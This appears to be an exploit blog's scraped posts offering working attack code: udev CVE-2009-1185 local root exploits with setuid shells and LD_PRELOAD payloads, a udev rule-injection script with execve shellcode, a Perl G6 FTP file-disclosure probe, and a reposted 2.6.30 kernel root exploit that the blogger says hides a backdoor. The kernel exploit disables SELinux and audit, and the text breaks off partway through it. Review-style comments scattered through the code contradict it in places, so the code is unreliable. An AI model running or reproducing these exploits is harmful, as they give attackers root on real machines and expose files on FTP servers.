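#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;      /* file scope, so it starts out zeroed */
struct iovec iovector;
int sz = 64*1024;

/* Forge one "add" uevent for block device 8:1 carrying REMOVE_CMD, send it
 * to the netlink port id in argv[1], wait, then exec /tmp/acc. */
int main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
if (argc < 2) {
fprintf(stderr, "usage: %s <netlink pid>\n", argv[0]);
return 1;
}
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
/* uevent wire format: "action@devpath" then NUL-separated KEY=VALUE pairs */
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
return 0;
}
_EOF
gcc ud.c -o /tmp/ud || exit 1

cat > prog.c << '_EOF'
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/* LD_PRELOAD payload (built with -nostartfiles so _init runs at load time):
 * setgid/setuid 0 -- effective only if the loading process is privileged --
 * drop LD_PRELOAD from the environment and run /tmp/acc. */
void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
_EOF
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

cat > acc.c << '_EOF'
#include <unistd.h>

/* Shell helper: only yields root once something has made this binary
 * setuid-root (how that happens is not shown in the posted script). */
int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",(char *)0);
return 1;
}
_EOF
gcc -o /tmp/acc acc.c || exit 1
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud "$1"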

And for the best version of all…

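#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
#
# Appends a udev rule to /dev/.udev/rules.d/root.rules (that directory must
# be writable by the invoking user for this to work at all) which runs
# ./usn.sh when the kernel event named in $1 fires; usn.sh then chowns and
# chmods ./usn setuid-root.  Nothing happens until udevd reloads its rules
# and the event occurs -- see the final echo lines.
#
# Review changes: every expansion of $PWD and $1 is quoted, so a working
# directory or event name with spaces/globs cannot break the generated
# script or the rule; the compile and the rule write are checked so a
# failure is reported instead of "All set".  The C helper is as posted: it
# overwrites its own saved return address (&r + 2 on a frame with one local)
# with the address of the shellcode string, which only works for that exact
# stack layout and only without a stack protector or non-executable data.
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root "$PWD/usn"
chmod +s "$PWD/usn"
EOF
cat > usn.c << 'EOF'
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn || { echo "gcc failed, aborting"; exit 1; }
chmod +x usn.sh
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules || { echo "cannot write /dev/.udev/rules.d/root.rules"; exit 1; }
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"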

That's the underground one, which is nice and neat, fast and furious :>
Enjoy them all — old now anyhow.
XD

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jon O.'s code — when it is neater and nicer than the alternatives, of course, but NOT when it has been crippled :) So this is being posted now; a bit late, but better than never.

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

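/*
 * Send one forged "remove" uevent to udevd's netlink socket.
 *
 * argv[1] is the netlink port id of udevd's socket as listed in
 * /proc/net/netlink (see the header).  The message is laid out the way
 * udevd parses uevents: "action@devpath" followed by NUL-separated
 * KEY=VALUE strings; REMOVE_CMD is what the late rules run on "remove"
 * (header comment above).
 *
 * Fixes: argv[1] is required (it was dereferenced unchecked); the msghdr is
 * zeroed, so msg_control/msg_controllen/msg_flags are no longer stack
 * garbage handed to sendmsg(); socket()/sendmsg() failures are reported.
 * A bind() failure is only warned about and the send still attempted,
 * since the original ignored it entirely.
 *
 * NOTE(review): the header says the exploit runs /tmp/run, but REMOVE_CMD
 * below is "bin/sh -i" -- a relative path with no leading slash, and an
 * interactive shell with no terminal.  The string is left as posted;
 * reconcile it with the header before relying on either.
 */
int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;

if (argc < 2) {
fprintf(stderr, "usage: %s <udevd netlink pid>\n", argv[0]);
return 1;
}
memset(&msg, 0, sizeof(msg));
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
if (sock < 0) {
perror("socket");
return 1;
}
if (bind(sock, (struct sockaddr *) &address, sizeof(address)) < 0)
perror("bind (continuing)");
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here (see NOTE above)
iovector.iov_base = (void*)message;
iovector.iov_len = (size_t)(mp-message);
if (sendmsg(sock, &msg, 0) < 0) {
perror("sendmsg");
close(sock);
return 1;
}
close(sock);
return 0;
}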

XD

G6 FtpServer file disclosure vuln script [some perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 FTP Server file disclosure vulnerability script, for anyone fuzzing G6 — it seems to have a very big user base on Windows, for sure.
ENJOY!

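######HAXNET
#!/usr/bin/perl
# G6 Ftp Server file disclosure vulnerability script
#
# Logs in to the target (anonymous/anonymous unless -l/-p are given) and
# uses the FTP SIZE command on absolute "drive:/path" names to learn whether
# files outside the FTP root can be reached: a 213 reply means the server
# answered for a file it should not expose.  That only makes sense when the
# server reports absolute paths, so PWD is inspected first.
#
# Review changes: replies are read through read_reply(), which follows a
# multi-line ("nnn-...") reply to its final "nnn " line and returns undef
# when the server drops the connection, so a long banner no longer
# desynchronises the exchange and a dead socket no longer gets a regex
# applied to undef.  Options and defaults are unchanged.
use Getopt::Std;
use IO::Socket;

# Read one complete FTP reply from $sock; undef when the connection is gone.
sub read_reply {
my $line = <$sock>;
return undef unless defined $line;
if ($line =~ /^(\d{3})-/) {
my $code = $1;
while (defined($line = <$sock>)) {
last if $line =~ /^$code /;
}
}
return $line;
}

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## drive letters to probe, including removable-media ones
$port = 21;
$login = 'anonymous';     ## default login, override with -l
$pass = 'anonymous';      ## default password, override with -p
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = read_reply();        # banner, possibly multi-line
print $sock "USER $login" . $CRLF;
$sock_res = read_reply();
print $sock "PASS $pass" . $CRLF;
$sock_res = read_reply();
unless (defined $sock_res && $sock_res =~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = read_reply();
unless (defined $sock_res && lc($sock_res) =~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;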

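# Probe each drive/directory combination for regedit.exe with SIZE; returns
# the first "drive:\dir" whose reply is 213 (file exists), else "[x] Not found".
# Fix: in the posted copy the SIZE command was split across two source lines
# ("SIZE" newline "/$drive:..."), which sent a bare SIZE followed by a second
# line and could never match; it is a single command again, as in FindIIS.
# A dropped connection (undef reply) is treated as "not found" for that path.
sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## common Windows directory names
foreach my $drive (@drives) {
foreach my $dir (@win_dirs) {
print ".";
print $sock "SIZE /$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if (defined $sock_res && $sock_res =~ /213\s/) {
return("$drive:\\$dir");
}
}
}
return("[x] Not found");
}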

# Probe each drive for a few well-known IIS files with SIZE; returns the first
# hit as a backslashed "drive:\path", else "[x] Not found".
sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
for my $letter (@drives) {
for my $candidate (@iis_files) {
print ".";
print $sock "SIZE /$letter:/$candidate" . $CRLF;
$sock_res = <$sock>;
next unless $sock_res =~ /213\s/;
(my $winpath = $candidate) =~ s/\//\\/g;
return("$letter:\\$winpath");
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF

LINUX 2.6.* Local x86_64 (ONLY) Backdoored AB rip-off code

Posted on 30th September 2011 in Exploits

We face a new low: from 1337day.com comes a 'new' 2011 kernel exploit. I looked through it, and it is STILL backdoored like the original ABftw.c code — which, as I recall, always binds a port (usually 9999, I believe; correct me if I'm wrong). It is a no-brainer to see that the shellcode hides stuff!
AB wont stand for this rubbuish, and theyre backdoor, is NON prtable :P
SO, this is being brought in front, and exposed, for the pathetic ripoff of ac1db1tch3z ,who unlike these jerkwads, actually KNOW theyre stuff.
This code is not even trying to use a new vector :s — it still makes syscalls via int 0x80, so how will this beat a 2010 kernel?
Anyhow, there is better exploit now for this, and much smaller, with no backdoors, and no mmap() needed. YES it is on this website, if your regged it will appear, unregged do NOT SEE all posts.
i would say, best todo is simply add us to a RSS feed, if anyone wants me to put up info + .tcl file on using eggdrop-with-rss for theyre own mIRC channels etc, just send me some ask in the form of a reply or comment even just pm..and ill be happy to make it, until there is a need then, what is the point.many people do not use tcl, or, dont use eggdrops on theyre linux box, they consider it security risk, but, i guess i use my one, from a registered shell account 9thx guys @ xzibition/Bryan.D in particular for his timeless adminship)
Again, thanks to all my #Haxnet @ EFNet friends ;>
it is now forsure, the best +ps channel ever made i think :P
Anyhow, feel free to show me, what this can do, this new exploit posted only TODAY mind you on 1337day.com, why is this, going to beat a -stab- kernel,and, i hope this aint some grab at a new method of enforcing linux and dummying it, coz, that is old to… I will post a grsec+selinux+chroot breakout, code wich works tho, wich does not need one bit of shellcode..nor shuld this smashing of stack on this, wont work on most boxes simply coz mmap() permission denied is still going to block it… you cannot make codes like this, thats just BS, NOTHING was even noted, and, this is still MCAST_FILTER attack… so, what is diffeent, again i ask… and, oh, btw, if u want to backdoor yourself, sure, go ahead, the cr3d shellcode is really a backdoor, or was it the idt…. :P
have fun.
The real deal, is NOT this crap.. believe in me this.
cheers loyal readers
xd

PS: IT-Undergound is alive and well =) i am glad and hope they can get some site up soon with codes, i posted one of theyre sshd bruter for win32 actually, wich is from roy-def8 ,and he is a top guy!
Greets to anyone i missed, but, pls, try to explain to me what this thing, is gong todo, like, why not try find another vector atleast, rather than 0×80, then we would atleast have a new attack…and those targets, just suck… they can be taken out with a bash script :P
So, please, stop posting rubbish like this, and , concentrate on things like, the recent FreeBSD-REL-STAB bugs in compress and in ipc.. that one, is specially nice, coz it is socket based, and alot like sendmessage.. very easy to code, but ill leave that for someone like kcope, so he can broaden his arsenal ;p hehe, like it isnt big enough!
peace to my ‘homies’ ? OK!

The allegedly bad code, posted as '0day' on 1337day.com — ROFL!!!!

/*
kernel-2.6.30 2010 Local Root Exploit
====================================================
Author : Th3 L0rd Dilaw [GarA]
Home : Mafia Hack Team & www.Arhack.net
Exploit DataBase: 1337day.com
Gr33tz : Dr.Sayros & Last breath & Dr.BiLLi &
Dr.Milas & O-Snip3r & El Boss Gangster
This local also works on:
2.6.30.10 | 2.6.30.1 | 2.6.30-rc6 | 2.6.30-rc5 | 2.6.30-rc3 | 2.6.30-rc2 | 2.6.30-rc1
(separators changed: the ones in the posted copy terminated this comment block early, so the file could not even compile as posted)
====================================================
*/
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>
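/* Fix: the guard was `#ifndef __i386__`, which refuses to build on x86_64 --
 * the only platform this code can target: the post's title says x86_64-only,
 * the message below says so, and every shellcode string uses REX.W (0x48)
 * prefixed 64-bit instructions plus a gs:-relative per-CPU load. */
#ifndef __x86_64__
#error "x86_64 is the targets here.."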
#else
/* NOTE(review): _GNU_SOURCE is defined here, AFTER every #include above, so
 * it has no effect on the headers already processed; it must precede the
 * first include to matter.  Identifiers starting with "__" are reserved for
 * the implementation; these obfuscated aliases for plain types/functions
 * only work by luck. */
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define BANNER "Ac1dB1tCh3z VS Linux kernel 2.6 kernel\n"

/* Files read and kernel symbol names looked up (presumably via KALLSYMS). */
#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
/* Fixed user-space mapping addresses (exact use is outside this excerpt). */
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000   /* NOTE(review): may collide with a system header's PAGE_SIZE */
/* Bit flags, presumably OR'ed into `flags` to select bypass strategies. */
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
/* Red Hat / CentOS 4 and 5 kernels, detected from the release string. */
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
#define TRY_REMAP_DEFAULT 1

/* Output / fatal-error helpers (GNU named-variadic macro in the first one).
 * NOTE(review): the last two pass `s` straight to fprintf() as the format
 * string -- only ever call them with string literals. */
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];              /* optval payload handed to the syscall (see fillsocketcallAT) */
static int s;                          /* AF_INET/SOCK_DGRAM socket opened in main() */
static int flags=0;                    /* bitmask of the KERN_* bits defined above */
volatile static socklen_t magiclen=0;  /* optlen value; its address is passed to the kernel, hence volatile */
static int useidt=0, usefops=0, uselsm=0;  /* which vector env_prepare() selected (at most one is used) */
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};  /* kernel addresses: RW_FOPS (-k); prepare/override/revert_creds (-c) */
static __dgdhdytrg55 _m_cpu_off=0;     /* per_cpu__current_task address/offset (-o) */
static char krelease[64];              /* utsname.release, filled by wtfyourunhere_heee() via strcpy()
                                        * NOTE(review): Linux utsname fields are 65 bytes, so a maximal release overflows this by one */
static char kversion[128];             /* utsname.version, filled the same way */

#define R0C_0FF 14

static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45

char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25

static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27

static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23

static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

/* One known RHEL kernel build: five kernel data-symbol addresses plus the
 * exact uname release/version strings used to recognise it.
 * lsm_rhel_find_target() matches an entry only when both strings compare
 * equal with strcmp(); the symbol names are those in the SELINUX_OPS ...
 * AUDIT_ENABLED macros below. */
struct LSM_rhel {
  __yyrhdgdtfs66ytgetrfd selinux_ops;         /* "selinux_ops" */
  __yyrhdgdtfs66ytgetrfd capability_ops;      /* "capability_ops" */
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;  /* "dummy_security_ops" */
  __yyrhdgdtfs66ytgetrfd selinux_enforcing;   /* "selinux_enforcing" */
  __yyrhdgdtfs66ytgetrfd audit_enabled;       /* "audit_enabled" */
  const char *krelease;                       /* utsname.release to match exactly */
  const char *kversion;                       /* utsname.version to match exactly */
};

struct LSM_rhel known_targets[4]= {
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,
    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,
   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,
    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,
    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops
    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled
    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }
};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;
/* Argument block for socketcall(2): the five getsockopt-style arguments laid
 * out back to back, since the multiplexer takes a pointer to an argument
 * array rather than the arguments themselves. Packed so no padding is
 * inserted between the fields. Filled by fillsocketcallAT(). */
struct socketcallAT {
  int s;                      /* socket descriptor */
  int level;                  /* SOL_IP */
  int optname;                /* MCAST_MSFILTER */
  void *optval;               /* points at the global `buffer` */
  volatile socklen_t *optlen; /* points at the global `magiclen` */
} __attribute__((packed));

/* Destination for the `sidt` instruction in getidt(): a 16-bit limit
 * followed by the base. This file is compiled as 32-bit code (see the
 * __i386__ guard above), so `unsigned long` is 4 bytes and only the low
 * half of the base is stored here; getidt() supplies the upper half. */
struct idt64from32_s {
  unsigned short limit;
  unsigned long base;
} __attribute__((packed));

/* Reads the IDTR via `sidt` into a zeroed idt64from32_s and returns the
 * base with its upper 32 bits forced to 0xFFFFFFFF. The high half is not
 * read from the hardware at all; it is assumed by the constant OR. */
static __yyrhdgdtfs66ytgetrfd getidt() {
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}

/* Reports whether SELinux appears to be present by probing SELINUX_PATH.
 * Returns 1 when the file opens, or when fopen() fails with errno == EPERM
 * (treated as "present but protected"); returns 0 for any other failure,
 * e.g. ENOENT when the path does not exist. */
static int isSelinuxEnabled() {
  FILE *probe = fopen(SELINUX_PATH, "r");
  if(probe != NULL) {
    fclose(probe);
    return 1;
  }
  /* open failed: only EPERM is taken as evidence that the file is there */
  return (errno == EPERM) ? 1 : 0;
}

/* Calls uname(2), copies the release and version strings into the caller's
 * buffers, and returns the numeric third dot-separated component of the
 * release (e.g. 32 for "2.6.32-…"). Returns -1 when uname() fails, when no
 * digit follows the second '.', or when that component parses as 0.
 * Both output buffers are written with strcpy(), so the caller must size
 * them for a full utsname field; the digit scratch buffer is 32 bytes and
 * the copy into it is not length-checked. */
static int wtfyourunhere_heee(char *out_release, char* out_version) {
  struct utsname un;
  char digits[32] = {0};
  size_t ndigits = 0;
  int dots = 0;
  const char *cur;

  if(uname(&un) < 0)
    return -1;
  strcpy(out_release, un.release);
  strcpy(out_version, un.version);

  /* Walk the release string; once two dots have been passed, collect
   * digits until the first non-digit character. */
  for(cur = un.release; *cur; cur++) {
    if(dots == 2) {
      if(*cur < '0' || *cur > '9')
        break;
      digits[ndigits++] = *cur;
    }
    if(*cur == '.')
      dots++;
  }

  if(ndigits == 0 || atoi(digits) == 0)
    return -1;
  return atoi(digits);
}

/* Writes table->selinux_enforcing and table->audit_enabled into the two
 * 8-byte immediate slots of dis4blens4sel1nuxhayettgdr64545 (at offsets
 * CJE_4554TFFDTRMAJHD_OFF and RJMPDDTGR_AYYYDGTREFCCV7761_OF), then copies
 * the patched stub — sizeof-1, i.e. without the string's NUL — into ttrfd0
 * and ruujhdbgatrfe345 at their reserved offsets. The stores are unaligned
 * 8-byte writes into char arrays. `table` is dereferenced unchecked; both
 * callers in main() pass curr_target. */
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
/* fill the two address slots of the stub */
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
/* splice the stub into both buffers (the macro expands to memcpy) */
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}

/* Looks up symbol `s` in a kallsyms/System.map-style file (`filename`),
 * where each line is expected to read "ADDRESS T NAME". Returns the address
 * parsed with strtoull(…, 16) on the first exact name match, or 0 when the
 * file cannot be opened, the name is absent, or the lookup is skipped
 * because KERN_HHSYPPLORQTWGFD is clear in `flags` and ignore_flag is 0.
 * NOTE(review): the FILE* is never fclose()d on either return path, so
 * every call leaks a descriptor. The address token is copied into a 64-byte
 * buffer with a 64-character bound, so a 64-character token leaves it
 * without a terminator. The "+= 3" skip assumes the single-character type
 * column; lines without a space are scanned up to the 64-char bound. */
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) {
  FILE *ka;
  char line[512];
  char reloc_a[64];   /* address token */
  char reloc[64];     /* symbol-name token */
  /* without a readable kallsyms the lookup is skipped unless forced */
  if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;
  ka = fopen(filename, "r");
  if(!ka)
    return 0;
  while(fgets(line, 512, ka) != NULL) {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    /* first token: the address, up to the first space */
    while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
      *ra_p++ = *l_p++;
    l_p += 3;   /* skip " T ": separator, one-character type, separator */
    /* second token: the symbol name */
    while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;
    if(!strcmp(reloc, s)) {
